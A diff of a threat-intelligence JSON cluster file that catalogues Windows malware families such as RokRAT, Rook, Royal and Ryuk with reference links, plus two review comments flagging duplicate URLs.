"https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf" ], "synonyms": [ "RobbinHood" @@ -41886,10 +43878,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505" + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [], "type": [] @@ -41914,9 +43906,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", - "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/" ], 
@@ -41944,35 +43936,36 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", - "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "https://asec.ahnlab.com/en/51751/", - "https://www.ibm.com/downloads/cas/Z81AVOY7", "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://www.youtube.com/watch?v=uoBQE5s2ba4", - "http://v3lo.tistory.com/24", - "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/", + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://twitter.com/ESETresearch/status/1575103839115804672", "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf", + 
"https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", + "http://v3lo.tistory.com/24", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://twitter.com/ESETresearch/status/1575103839115804672", + "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48", + "https://asec.ahnlab.com/en/51751/", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "https://unit42.paloaltonetworks.com/atoms/moldypisces/", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.ibm.com/downloads/cas/Z81AVOY7", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", - "https://unit42.paloaltonetworks.com/atoms/moldypisces/", - 
"https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab" + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" ], "synonyms": [ "DOGCALL" @@ -42019,10 +44012,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat", + "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", + "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", + "https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/", "https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries", - "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass", + "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", + "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/", "https://cert.gov.ua/article/3349703", - "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/" + "https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/", + "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass" ], "synonyms": [], "type": [] 
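Review bot: The rokrat refs keep the same Talos article twice on the new side, `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`, differing only in scheme (the kindredsec.com / kindredsec.wordpress.com pair looks like one post on two hosts, but that is an inference). The rook hunk below likewise keeps the Microsoft ransomware-as-a-service post both with and without a trailing slash. Normalising scheme and trailing slash before de-duplicating, or dropping the http variant by hand, would shorten the lists without losing a source; if the lists are imported verbatim, the normalisation belongs in the importer.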
@@ -42043,18 +44041,18 @@ "value": "Romeo(Alfa,Bravo, ...)" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Rook is ransomware (an updated variant of Babuk) that prevents victims from accessing/opening files by encrypting them. It also modifies filenames and creates a text file/ransom note (\"HowToRestoreYourFiles.txt\"). Rook renames files by appending the \".Rook\" extension. For example, it renames \"1.jpg\" to \"1.jpg.Rook\", \"2.jpg\" to \"2.jpg.Rook\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook", + "https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://seguranca-informatica.pt/rook-ransomware-analysis/", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md", - "https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/", - "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/", - "https://seguranca-informatica.pt/rook-ransomware-analysis/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + 
"https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/" ], "synonyms": [], "type": [] @@ -42093,9 +44091,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach", "https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html", - "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/", "https://www.group-ib.com/blog/bablock-ransomware/", "https://medium.com/@simone.kraus/rorschach-ransomware-analysis-with-attack-flow-7fa5ff613a75", + "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/d/an-analysis-of-the-bablock-ransomware-/iocs-an-analysis-of-the-babLock-ransomware.txt" ], "synonyms": [ @@ -42126,10 +44124,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roshtyak", - "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/" + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", + "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/" ], "synonyms": [], "type": [] 
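Review bot: The reordered refs for win.rook still carry the Microsoft ransomware-as-a-service article twice, once with and once without the trailing slash (`...how-to-protect-yourself/` and `...how-to-protect-yourself`), so the new side has a duplicate reference rather than a clean list. The Royal ransom hunk (`@@ -42232,29 +44230,33 @@`) shows the same pattern, keeping two paths to the single ACSC advisory `2023-01-acsc-ransomware-profile-royal` (`/about-us/advisories/...` and `/acsc/view-all-content/advisories/...`). Because this cluster file appears to be regenerated from an upstream export, the cleanup likely belongs in the generator: normalise trailing slashes before de-duplicating refs and keep one URL per advisory, or drop the slash-less Microsoft entry here if the file is hand-maintained.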
@@ -42173,17 +44171,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", "https://securelist.com/oh-what-a-boot-iful-mornin/97365", + "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/" + "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", + "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0" ], "synonyms": [ "BkLoader", 
@@ -42200,10 +44198,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", - "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -42216,10 +44214,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", - "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] 
@@ -42232,29 +44230,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom", - "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html", - "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/", - "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", - "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/", - "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://securityscorecard.pathfactory.com/research/the-royal-ransomware", + "https://socradar.io/dark-web-profile-royal-ransomware/", + "https://unit42.paloaltonetworks.com/royal-ransomware/", + "https://www.bridewell.com/insights/news/detail/hunting-for-ursnif", "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/", + "https://www.cybereason.com/blog/royal-ransomware-analysis", + "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware", + "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/", + "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", + "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html", + 
"https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/", + "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", "https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal", "https://www.coalitioninc.com/blog/active-exploitation-firewalls", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/royal-ransomware/", - "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", - "https://securityscorecard.pathfactory.com/research/the-royal-ransomware", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware", - "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", - "https://socradar.io/dark-web-profile-royal-ransomware/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - 
"https://www.cybereason.com/blog/royal-ransomware-analysis" + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf" ], "synonyms": [], "type": [] @@ -42267,10 +44269,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", - "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor", - "https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/", "https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors", - "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" + "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena", + "https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/", + "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor" ], "synonyms": [], "type": [] 
@@ -42283,13 +44285,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "https://jonahacks.medium.com/malware-analysis-manual-unpacking-of-redaman-ec1782352cfb", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.youtube.com/watch?v=YXnNO3TipvM", + "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.youtube.com/watch?v=YXnNO3TipvM", "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" ], "synonyms": [ 
@@ -42399,20 +44401,33 @@ "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustbucket", + "https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "832680ff-8b29-492e-8523-62510eb5d021", + "value": "RustBucket (Windows)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", - "https://darknetdiaries.com/episode/110/", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", + "https://darknetdiaries.com/episode/110/", + "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", + "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf" ], "synonyms": [], 
@@ -42426,170 +44441,171 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://github.com/scythe-io/community-threats/tree/master/Ryuk", - "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", - "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - 
"https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", - "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", - "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", - "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://github.com/scythe-io/community-threats/tree/master/Ryuk", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://www.youtube.com/watch?v=CgDtm05qApE", + "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", + "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/0bcefe76", + 
"https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", + "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.youtube.com/watch?v=7xxRunBP5XA", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", + "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", + 
"https://twitter.com/Prosegur/status/1199732264386596864", + "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp", + "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.youtube.com/watch?v=HwfRxjV2wok", + "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", + "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", 